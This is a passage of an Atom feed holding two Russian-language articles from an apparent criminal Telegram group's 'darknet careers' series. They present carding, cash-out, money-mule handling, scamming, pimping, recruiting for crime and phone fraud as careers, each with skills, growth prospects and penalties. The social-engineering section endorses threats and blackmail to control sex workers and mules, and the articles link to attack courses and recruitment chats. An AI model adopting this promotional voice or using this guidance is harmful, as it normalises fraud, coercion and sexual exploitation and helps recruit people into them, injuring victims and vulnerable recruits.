  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;2.-Кардер&quot; data-align=&quot;center&quot;&gt;&lt;strong&gt;2. Кардер&lt;/strong&gt;&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;Bv2q&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/f38cc8498c9516bfc96d8.png&quot; width=&quot;2048&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;9z90&quot;&gt;&lt;strong&gt;Описание:&lt;/strong&gt; это лица, занимающиеся незаконным использованием данных кредитных карт для осуществления финансовых преступлений. Они могут как самостоятельно совершать операции с украденными данными, так и продавать эти данные другим преступникам, покупка цифровых товаров с данных украденных карт, обналичивание их через мерчи в свой карман или заказ вещей с этих кард на адреса дропов.&lt;/p&gt;
  &lt;p id=&quot;I8uv&quot;&gt;&lt;strong&gt;Требования:&lt;/strong&gt; для успешной деятельности кардеру необходимы знания о методах хакерства, понимание работы финансовых систем и навыки анонимности в интернете. Умение анализировать риски и находить уязвимости в системах безопасности, дабы успешно их обходить. Умение скрывать информацию о себе и мимикрировать под действия хозяина украденной карты.&lt;/p&gt;
  &lt;p id=&quot;Upnj&quot;&gt;&lt;strong&gt;Перспективы роста:&lt;/strong&gt; спрос на услуги кардеров продолжает расти, особенно с увеличением числа онлайн-транзакций. Успешные кардеры могут создать устойчивую сеть клиентов и получать значительные доходы от своих операций, но системы безопасности не стоят на месте, поэтому с каждым годом кардерам всё тяжелее осуществлять свои махинации.&lt;/p&gt;
  &lt;p id=&quot;M66w&quot;&gt;&lt;strong&gt;Наказание: &lt;/strong&gt;Статья 159 УК РФ(Мошенничество), Статья 272 УК РФ (Неправомерный доступ к компьютерной информации), Статья 273 УК РФ (Создание, использование и распространение вредоносных программ), Статья 187 УК РФ (Неправомерный оборот средств платежей), Статья 174 УК РФ (Легализация (отмывание) денежных средств или иного имущества, приобретенных другими лицами преступным путем)&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;3.-Обнальщик&quot; data-align=&quot;center&quot;&gt;3. Обнальщик&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;nHZM&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/85530a962522f5ff2f0ec.png&quot; width=&quot;2048&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;cpGk&quot;&gt;&lt;strong&gt;Описание:&lt;/strong&gt; эти персонажи занимаются незаконным обналичиванием денежных средств, полученных преступным путем. Они предоставляют услуги по превращению электронных средств в наличные деньги или криптовалюту, используя различные схемы и методы, чтобы избежать обнаружения правоохранительными органами. Обычно это происходит так, заливщик договаривается с обнальщиком по поводу процента, который каждый из них получит, и заливает на реквизиты обнальщика, которые тот в свою очередь берёт от дропов, регистрируя карты, банки или фирмы на них.&lt;/p&gt;
  &lt;p id=&quot;qobl&quot;&gt;&lt;strong&gt;Требования:&lt;/strong&gt; для успешной деятельности обнальщику необходимы знания о финансовых системах, умение работать с поддельными документами и навыки анонимности в интернете. Умение договариваться и выстраивать связи так же не помешает.&lt;/p&gt;
  &lt;p id=&quot;Qfx2&quot;&gt;&lt;strong&gt;Перспективы роста:&lt;/strong&gt; успешные обнальщики, могут обзавестись устойчивой базой заливщиков и дроповодов, что в свою очередь обеспечит стабильный доход, а в дальнейшем с таким опытом вам все дороги открыты.&lt;/p&gt;
  &lt;p id=&quot;VWcd&quot;&gt;&lt;strong&gt;Наказание:&lt;/strong&gt; Статья 159 УК РФ(Мошенничество), Статья 186 УК РФ (Изготовление или сбыт поддельных документов), Статья 174 УК РФ(Отмывание доходов, полученных преступным путем)&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;4.-Дроп&quot; data-align=&quot;center&quot;&gt;4. Дроп&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;zYz8&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/894dd3295fc8590517680.png&quot; width=&quot;2048&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;vEyX&quot;&gt;&lt;strong&gt;Описание: &lt;/strong&gt;если человек - это вершина пищевой цепочки, то дроп - это дно человека и даркнета. Если кратко, то дроп - это тот, кто предоставляет свои карты, личные кабинеты, паспортные и другие личные данные, физические услуги и многое другое своему дроповоду взамен на деньги или спасибо. Обычно они не блещут интеллектом и самые первые летят на корм нашим товарищам в погонах.&lt;/p&gt;
  &lt;p id=&quot;pFuR&quot;&gt;&lt;strong&gt;Требования:&lt;/strong&gt; для успешной деятельности дропу нужен лишь &amp;quot;актёрский талант&amp;quot;, чтобы вовремя соскачить или хоть как-то помочь себе потом. Фактически никаких требований нет, дропом может стать любой желаюший, чаще всего это студенты, бедствующие люди с недостатком интеллекта или подкованности в некоторых темах, по типу бомжей и алкашей, либо пенсионеры и т.п.&lt;/p&gt;
  &lt;p id=&quot;5YCM&quot;&gt;&lt;strong&gt;Перспективы роста:&lt;/strong&gt; разве что скосить под дурачка и получить штраф или условку за то, что дал свои платёжные данные и пособничал в отмыве и мошенничестве. А так перспективы отсутствуют (только дропу не говорите)&lt;/p&gt;
  &lt;p id=&quot;M74i&quot;&gt;&lt;strong&gt;Наказание:&lt;/strong&gt; Статья 159 УК РФ (Мошенничество), Статья 171 УК РФ (Незаконное предпринимательство), Статья 172 УК РФ (Незаконная банковская деятельность), Статья 174 УК РФ(Отмывание доходов, полученных преступным путем)&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;5.-Гарант&quot; data-align=&quot;center&quot;&gt;5. Гарант&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;7Bgf&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/644167cbfaea4abed121b.png&quot; width=&quot;2048&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;nEew&quot;&gt;&lt;strong&gt;Описание:&lt;/strong&gt; это фигура, стоящая между покупателем и продавцом, обеспечивающая выполнение условий сделки. Он берет на себя ответственность за удержание средств до тех пор, пока обе стороны не подтвердят выполнение своих обязательств. Гаранты могут быть как опытными участниками даркнет форумов, так и новичками, которые стремятся заработать на доверии пользователей. Их задача — минимизировать риски мошенничества и обеспечить защиту от недобросовестных участников, но не редки также случаи скама со стороны гарантов или их фейков.&lt;/p&gt;
  &lt;p id=&quot;nYxK&quot;&gt;&lt;strong&gt;Требования: &lt;/strong&gt;для успешной деятельности гаранту требуется определенный уровень доверия со стороны пользователей. Это может быть достигнуто через положительную репутацию, отзывы и опыт в проведении сделок. Гаранту необходимо иметь навыки коммуникации и разрешения споров, а также знание основных принципов безопасности в даркнете.&lt;/p&gt;
  &lt;p id=&quot;wb1F&quot;&gt;&lt;strong&gt;Перспективы роста: &lt;/strong&gt;успешные гаранты могут развивать свою деятельность, увеличивая объем сделок и зарабатывая на комиссиях. Они могут стать авторитетами в определенных кругах, что открывает возможности для сотрудничества с более крупными игроками.&lt;/p&gt;
  &lt;p id=&quot;tNrD&quot;&gt;&lt;strong&gt;Наказание:&lt;/strong&gt; Статья 316 УК РФ(Укрывательство преступлений), Статья 171 УК РФ (Незаконное предпринимательство)&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;6.-Арбитр&quot; data-align=&quot;center&quot;&gt;6. Арбитр&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;bLWX&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/81f53e61fc607c14893d9.png&quot; width=&quot;2048&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ZpPc&quot;&gt;&lt;strong&gt;Описание:&lt;/strong&gt; это своего рода судья, который находится в самой верхней части иерархии теневых сделок. Он обеспечивает порядок в хаосе, выступая посредником между конфликтующими сторонами. Арбитры могут иметь разный опыт и репутацию, но их основная задача — разрешать споры и обеспечивать безопасность сделок. Арбитры часто обладают определёнными навыками и знаниями, что позволяет им действовать более осознанно и эффективно по отношению к конфликтующим.&lt;/p&gt;
  &lt;p id=&quot;xunU&quot;&gt;&lt;strong&gt;Требования:&lt;/strong&gt; для успешной деятельности арбитру необходимы аналитические способности, умение вести переговоры и знание специфики даркнета. Он должен быть беспристрастным, уметь оценивать доказательства и принимать решения, основываясь на фактах. Также важна высокая степень конфиденциальности и способность сохранять анонимность, чтобы избежать преследования.&lt;/p&gt;
  &lt;p id=&quot;s7Mh&quot;&gt;&lt;strong&gt;Перспективы роста: &lt;/strong&gt;арбитры могут развиваться, накапливая опыт и репутацию на форумах. С течением времени они могут стать более влиятельными фигурами, получая доступ к более сложным сделкам и высоким доходам. Однако с ростом статуса приходит и повышенный риск — чем выше уровень арбитра, тем больше внимания он привлекает со стороны правоохранительных органов.&lt;/p&gt;
  &lt;p id=&quot;Fcgj&quot;&gt;&lt;strong&gt;Наказание: &lt;/strong&gt;Статья 316 УК РФ (Укрывательство преступлений)&lt;/p&gt;
  &lt;p id=&quot;3SpH&quot;&gt;&lt;a href=&quot;https://t.me/c/1895626515/99&quot; target=&quot;_blank&quot;&gt;&lt;em&gt;P.S. Вот тут вы можете прочесть про процесс арбитража подробнее&lt;/em&gt;&lt;/a&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;zWEd&quot; data-align=&quot;center&quot;&gt;Наш канал: &lt;a href=&quot;https://t.me/+eATHVyrDVPUwYzk8&quot; target=&quot;_blank&quot;&gt;https://t.me/+eATHVyrDVPUwYzk8&lt;/a&gt;&lt;br /&gt;Наш чат: &lt;a href=&quot;https://t.me/+hDPQsUT7YEljNzc8&quot; target=&quot;_blank&quot;&gt;https://t.me/+hDPQsUT7YEljNzc8&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>parabellum_clan:darknet_career_part2</id><link rel="alternate" type="text/html" href="https://teletype.in/@parabellum_clan/darknet_career_part2?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=parabellum_clan"></link><title>Карьерные пути теневой паутины Ч.2</title><published>2025-06-17T09:22:06.970Z</published><updated>2025-06-17T09:22:06.970Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img3.teletype.in/files/6a/fc/6afc7c8d-6aaa-4908-a68c-71b6ba420842.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://telegra.ph/file/6cc71e5c5ca2e881fa419.png&quot;&gt;Доброго дня, дамы и господа, с вами Parabellum Clan. Это 2-я статья цикла о профессиях даркнета и здесь мы решили разобрать профессии, которые связаны с активной работой с людьми. Если у вас возникают какие-то вопросы, вы всегда можешь спросить в нашем уютном чате тех, кто сейчас работает в этих направлениях.</summary><content type="html">
  &lt;figure id=&quot;gKxC&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/6cc71e5c5ca2e881fa419.png&quot; width=&quot;1500&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;D8ko&quot;&gt;Доброго дня, дамы и господа, с вами &lt;a href=&quot;https://t.me/+rsXkVug4O0IyZjZk&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Parabellum Clan&lt;/strong&gt;&lt;/a&gt;. Это 2-я статья цикла о профессиях даркнета и здесь мы решили разобрать профессии, которые связаны с активной работой с людьми. Если у вас возникают какие-то вопросы, вы всегда можешь спросить в &lt;a href=&quot;https://t.me/+kZbasZ-d4hk2MDFk&quot; target=&quot;_blank&quot;&gt;нашем уютном чате&lt;/a&gt; тех, кто сейчас работает в этих направлениях.&lt;/p&gt;
  &lt;p id=&quot;XwcM&quot;&gt;&lt;strong&gt;Содержание:&lt;/strong&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/aC4jfuPaf8d#1.-%25D0%2597%25D0%25B0%25D1%2587%25D0%25B5%25D0%25BC-%25D0%25BD%25D1%2583%25D0%25B6%25D0%25BD%25D0%25B0-%25D0%25A1%25D0%2598-%25D0%25B2-%25D0%25B4%25D0%25B0%25D1%2580%25D0%25BA%25D0%25BD%25D0%25B5%25D1%2582%25D0%25B5?&quot;&gt; 1. Зачем нужна СИ в даркнете?&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/aC4jfuPaf8d#2.-%25D0%25A1%25D0%25BA%25D0%25B0%25D0%25BC%25D0%25B5%25D1%2580&quot;&gt; 2. Скамер&lt;/a&gt;&lt;a href=&quot;/@parabellumclan/aC4jfuPaf8d#3.-%25D0%25A1%25D1%2583%25D1%2582%25D0%25B5%25D0%25BD%25D1%2591%25D1%2580&quot;&gt; 3. Сутенёр&lt;/a&gt;&lt;a href=&quot;/@parabellumclan/aC4jfuPaf8d#4.-%25D0%2594%25D1%2580%25D0%25BE%25D0%25BF%25D0%25BE%25D0%25B2%25D0%25BE%25D0%25B4&quot;&gt; 4. Дроповод&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/aC4jfuPaf8d#5.-%25D0%25A0%25D0%25B5%25D0%25BA%25D1%2580%25D1%2583%25D1%2582%25D0%25B5%25D1%2580&quot;&gt; 5. Рекрутер&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/aC4jfuPaf8d#6.-%25D0%259E%25D1%2584%25D0%25B8%25D1%2581%25D0%25BD%25D0%25B8%25D0%25BA&quot;&gt; 6. Офисник&lt;/a&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;1.-Зачем-нужна-СИ-в-даркнете?&quot; data-align=&quot;center&quot;&gt;1. Зачем нужна СИ в даркнете?&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;T2pC&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/1a9769dcebc1423c4276a.png&quot; width=&quot;2048&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;6Cab&quot;&gt;Социальная инженерия проявляется через различные манипулятивные техники, которые используются практически во всех областях дарка, от дроповодства и сутенёрства до стандартных офисников и скамеров. Их всех объединяет надобность использования социальной инженерии для достижения своих целей.&lt;/p&gt;
  &lt;p id=&quot;vWvU&quot;&gt;Вот некоторые примеры, которые приемлемы для сегодняшних профессией:&lt;/p&gt;
  &lt;p id=&quot;qdLg&quot;&gt;&lt;strong&gt;1. Сутенёрство&lt;/strong&gt;&lt;br /&gt;&lt;em&gt; - Манипуляция жертвами:&lt;/em&gt; сутенёры могут использовать психологические приемы для привлечения и удержания эскортниц (например, обещания лучшей жизни, быстрых денег или защиты).&lt;br /&gt;&lt;em&gt; - Создание доверия:&lt;/em&gt; использование фальшивых личностей или историй, чтобы завоевать доверие потенциальных жертв.&lt;br /&gt;&lt;em&gt; - Угрозы и шантаж:&lt;/em&gt; после привлечения эскортницы нами могут применяться угрозы или шантаж для контроля над ней.&lt;/p&gt;
  &lt;p id=&quot;bFjR&quot;&gt;&lt;strong&gt;2. Дроповодство&lt;/strong&gt;&lt;br /&gt;&lt;em&gt; - Обман потенциальных дропов&lt;/em&gt;: дроповоды могут убеждать людей стать &amp;quot;дропами&amp;quot;, обещая легкую прибыль, используя фальшивые истории о работе или жизненной ситуации.&lt;br /&gt;&lt;em&gt; - Создание фальшивых личностей:&lt;/em&gt; использование подделанных документов для создания ложных личностей и использование уже самой личности для вербовки, что затрудняет отслеживание дроповода.&lt;br /&gt;&lt;em&gt; - Использование страха:&lt;/em&gt; угрозы разоблачения или юридических последствий могут заставить дропов выполнять требования, но угрозы должны быть правильно построены, а для этого с помощью СИ мы выясняем нужные рычаги давления.&lt;/p&gt;
  &lt;p id=&quot;XsWJ&quot;&gt;&lt;strong&gt;3. Скам&lt;/strong&gt;&lt;em&gt; - Фальшивые инвестиционные схемы:&lt;/em&gt; социальная инженерия используется для создания доверия к мошенническим схемам, где мамонты вкладывают деньги в несуществующие проекты.&lt;em&gt; - Обман через подделки: &lt;/em&gt;создание поддельных сайтов или профилей для сбора личной информации или денег.&lt;em&gt; - Использование паники или срочности:&lt;/em&gt; в условиях кризиса скамерсанты могут использовать страх и неуверенность для манипуляции мамонтами.&lt;/p&gt;
  &lt;p id=&quot;4X71&quot;&gt;Примеры использования мы разобрали, пора переходить к профессиям, которые чаще всего используют СИ, правильно? А вот и нет, толку вам от знания этих примеров, лучше взгляните на гайды по СИ, которые есть у нас на канале, они будут полезны, как новичку, так и опытному инженеру:&lt;/p&gt;
  &lt;ul id=&quot;IQ59&quot;&gt;
    &lt;li id=&quot;Tvuw&quot;&gt;&lt;a href=&quot;https://t.me/c/1895626515/493&quot; target=&quot;_blank&quot;&gt;&lt;em&gt;Курс &amp;quot;Социальная инженерия. Черный профайлинг&amp;quot;&lt;/em&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li id=&quot;STpq&quot;&gt;&lt;a href=&quot;https://t.me/c/1895626515/813&quot; target=&quot;_blank&quot;&gt;&lt;em&gt;Разнообразие атак СИ. Все актуальные методы&lt;/em&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li id=&quot;sMtA&quot;&gt;&lt;a href=&quot;https://t.me/c/1895626515/873&quot; target=&quot;_blank&quot;&gt;&lt;em&gt;Методы СИ-атак на сотрудников компаний &lt;/em&gt;&lt;/a&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;2.-Скамер&quot; data-align=&quot;center&quot;&gt;2. Скамер&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;q8VV&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/5f5be8bd72f7a6b3b537f.png&quot; width=&quot;2048&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;2W7p&quot;&gt;&lt;strong&gt;Описание:&lt;/strong&gt; это виртуальные мошенники, которые используют свои навыки для обмана и кражи денег у доверчивых мамонтов. Они создают фальшивые сайты, предлагают несуществующие товары и услуги или разрабатывают сложные схемы, направленные на извлечение личной информации и финансовой выгоды. Эти «цифровые манипуляторы» действуют без моральных принципов и преследуют исключительно финансовую выгоду, часто работая в команде или поодиночке. Сейчас у нас есть множество скам-команд (тим), но для представителей даркнета назваться скамером дело порицаемое, поэтому это больше развлечение для школьников и скам на обеды в столовой.&lt;/p&gt;
  &lt;p id=&quot;QsPY&quot;&gt;&lt;strong&gt;Требования:&lt;/strong&gt; если судить в рамках адекватности, то нужны навыки анонимизации и перевоплощения, Однако сейчас достаточно навыков использования социальных приемов и работы с мессенджерами. Даже новички могут быстро освоить основные методы обмана, благодаря множеству доступных инструкций и готовых решений в даркнете или у самих скам-тим.&lt;/p&gt;
  &lt;p id=&quot;SPA5&quot;&gt;&lt;strong&gt;Перспективы роста:&lt;/strong&gt; единственная перспектива после такого опыта, это создание собственной команды, но опять же, большинство сидит без профитов и заглядывает в скамерство лишь из интереса и для первого опыта, но никак не для развития.&lt;/p&gt;
  &lt;p id=&quot;wNMO&quot;&gt;&lt;strong&gt;Наказание: &lt;/strong&gt;согласно статьям 159 (Мошенничество), 272 (Несанкционированный доступ к компьютерной информации) и 273 (Создание и распространение вредоносных программ) УК РФ, за действия скамеров предусмотрены серьезные наказания. Это может включать крупные штрафы и длительные сроки лишения свободы, что делает работу маленьких скамерсантов крайне рискованной&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;3.-Сутенёр&quot; data-align=&quot;center&quot;&gt;3. Сутенёр&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;vfZZ&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/cdec0f933c5fd560f05b9.png&quot; width=&quot;2048&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;hIFO&quot;&gt;&lt;strong&gt;Описание:&lt;/strong&gt; это посредники, которые организуют и управляют услугами секс-работниц, действуя в рамках теневой экономики. Они создают анонимные платформы для связи между клиентами и секс-работницами, часто используя фальшивые профили и рекламу, чтобы привлечь внимание. Эти «виртуальные мачо» действуют без моральных принципов, преследуя исключительно финансовую выгоду, и могут работать как индивидуально, так и в составе преступных групп.&lt;/p&gt;
  &lt;p id=&quot;RseY&quot;&gt;&lt;strong&gt;Требования:&lt;/strong&gt; для успешной работы сутенёром вам не помешает широкий карман, уверенные навыки манипулирования и флирта, но и холодный разум для дальнейшего давления на подопечных. Существуют множество ресурсов и форумов, где новички могут быстро освоить основные приемы и стратегии ведения бизнеса, включая создание защищенных каналов связи и способы обхода правоохранительных органов.&lt;/p&gt;
  &lt;p id=&quot;7cMJ&quot;&gt;&lt;strong&gt;Перспективы роста: &lt;/strong&gt;успешные сутенёры могут добиться значительных финансовых результатов и создать устойчивую сеть клиентов и секс-работниц. Однако конкуренция высока, и риски также значительны — недовольные клиенты или секс-работницы могут попытаться подставить или сообщить о них в правоохранительные органы. Успех зависит только от того, как вы сами подойдёте к делу, но чем выше и влиятельнее будут клиенты, тем безопаснее будет ваша работа.&lt;/p&gt;
  &lt;p id=&quot;cuCc&quot;&gt;&lt;strong&gt;Наказание:&lt;/strong&gt; Статья 240 (Организация проституции) и 241 (Сексуальная эксплуатация) УК РФ&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;4.-Дроповод&quot; data-align=&quot;center&quot;&gt;4. Дроповод&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;O19i&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/15efa94e84e82cf48a769.png&quot; width=&quot;2048&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;v5DN&quot;&gt;&lt;strong&gt;Описание: &lt;/strong&gt; это очередные посредники, которые организуют и управляют незаконной деятельностью, связанной с финансовыми махинациями. Они вербуют и используют различных маргинальных и бедствующих личностей к становлению дропом. Нередко в качестве дропа выступают студенты, бомжи, алкаши и прочие. Их используют с различными целями: создание фирм-однодневок, передача банковских счетов и карт, обналичивание средств, принятие посылок, прохождение верификаций и т.д.&lt;/p&gt;
  &lt;p id=&quot;yRcA&quot;&gt;&lt;strong&gt;Требования: &lt;/strong&gt;основы анонимности, знание метода кнута и пряника, опытное владение СИ и использование рычагов давления, так же опрятный внешний вид и внешняя доброжелательность.&lt;/p&gt;
  &lt;p id=&quot;G8r4&quot;&gt;&lt;strong&gt;Перспективы роста:&lt;/strong&gt; в качестве перспективы можно вынести создание устойчивой базы клиентов и дропов, которая в дальнейшем будет приносить хороший доход. Так же сотрудничество со скупами может позитивно сказаться на дроповоде, так как им дополнительно выплачиваются проценты сверху за количество.&lt;/p&gt;
  &lt;p id=&quot;Ydav&quot;&gt;&lt;strong&gt;Наказание:&lt;/strong&gt; Статья 159 (Мошенничество), 172 (Организация незаконной банковской деятельности) УК РФ&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;5.-Рекрутер&quot; data-align=&quot;center&quot;&gt;5. Рекрутер&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;Sxwn&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/55cb9bc7235e13fd066b4.png&quot; width=&quot;2048&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;3PmX&quot;&gt;&lt;strong&gt;Описание:&lt;/strong&gt; это опять же посредники, которые занимаются поиском и набором специалистов для участия в незаконной деятельности. Они могут работать как на преступные группировки, так и на отдельных клиентов, предоставляя доступ к профессионалам, обладающим специфическими навыками, такими как хакерство, создание поддельных документов или даже физическая расправа. Такие агенты имеют весьма хорошую репутацию в дарке и помогают вам, если нет времени самому искать эксперта.&lt;/p&gt;
  &lt;p id=&quot;25Fj&quot;&gt;&lt;strong&gt;Требования:&lt;/strong&gt; здесь всё просто, вы должны грамотно использовать приёмы СИ и обороняться от них, умея и цену сбросить и связями обзавестись, помимо этого, навыки работы с людьми, проверка их квалификации, подбор персонала и многое другое вы будете делать сами или со своей командой, поэтому высшее образование в области психологии вам не повредит, как и опыт работы HR-менеджером.&lt;/p&gt;
  &lt;p id=&quot;GyeX&quot;&gt;&lt;strong&gt;Перспективы роста:&lt;/strong&gt; перспективы здесь не сильно отличаются от других посреднических ролей, то есть - формирование устойчивой базы клиентов и связей, а также создание и развитие собственного сервиса и команды.&lt;/p&gt;
  &lt;p id=&quot;Ahb1&quot;&gt;&lt;strong&gt;Наказание: &lt;/strong&gt;фактически, деятельность рекрутера попадает под множество статей, в зависимости от того, для каких целей он набирает спецов, но самыми частыми будут Статьи 33 и 210 УК РФ, о пособничестве и создании преступных организаций.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;6.-Офисник&quot; data-align=&quot;center&quot;&gt;6. Офисник&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;yuXA&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/11b507917a3a6c7815ac4.png&quot; width=&quot;2048&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;k4k9&quot;&gt;&lt;strong&gt;Описание:&lt;/strong&gt; это уже никакие не посредники, а настоящие мошенники, работающие в офисах или удаленно, которые занимаются телефонным обманом. Они представляются родственниками, сотрудниками банков или другими доверительными лицами, чтобы манипулировать жертвами и вымогать у них деньги. Их цель — создать иллюзию срочной финансовой необходимости, заставляя жертв переводить деньги под различными предлогами. Самыми известными являются украинские и индийские офисники, которые работают по СНГ и США соответственно.&lt;/p&gt;
  &lt;p id=&quot;yo22&quot;&gt;&lt;strong&gt;Требования:&lt;/strong&gt; для успешной работы офисникам необходимы навыки общения, умение манипулировать эмоциями и знание психологии. Важно также уметь создавать доверительные отношения и быстро реагировать на изменения в разговоре.&lt;/p&gt;
  &lt;p id=&quot;kNVQ&quot;&gt;&lt;strong&gt;Перспективы роста:&lt;/strong&gt; спрос на услуги офисных мошенников остаётся высоким, так как многие люди по-прежнему доверчивы и не подозревают о подобных схемах, но рост в лице офисника остаётся за кадром, дальше прозвонщика ты не дойдёшь, если не откроешь собственный офис, а для этого о-го-го сколько связей нужно.&lt;/p&gt;
  &lt;p id=&quot;KvmM&quot;&gt;&lt;strong&gt;Наказание: &lt;/strong&gt;сюда прекрасно вписываются Статьи 159, 160, и 272 УК РФ, они о мошенничестве, присвоение чужого и неправомерном доступе к компьютерной информации (коей выступают базы, используемые прозвонщиками)&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;zyzB&quot;&gt;Наш канал: &lt;a href=&quot;https://t.me/+eATHVyrDVPUwYzk8&quot; target=&quot;_blank&quot;&gt;https://t.me/+eATHVyrDVPUwYzk8&lt;/a&gt;&lt;br /&gt;Наш чат: &lt;a href=&quot;https://t.me/+hDPQsUT7YEljNzc8&quot; target=&quot;_blank&quot;&gt;https://t.me/+hDPQsUT7YEljNzc8&lt;/a&gt;&lt;/p&gt;

</content></entry></feed>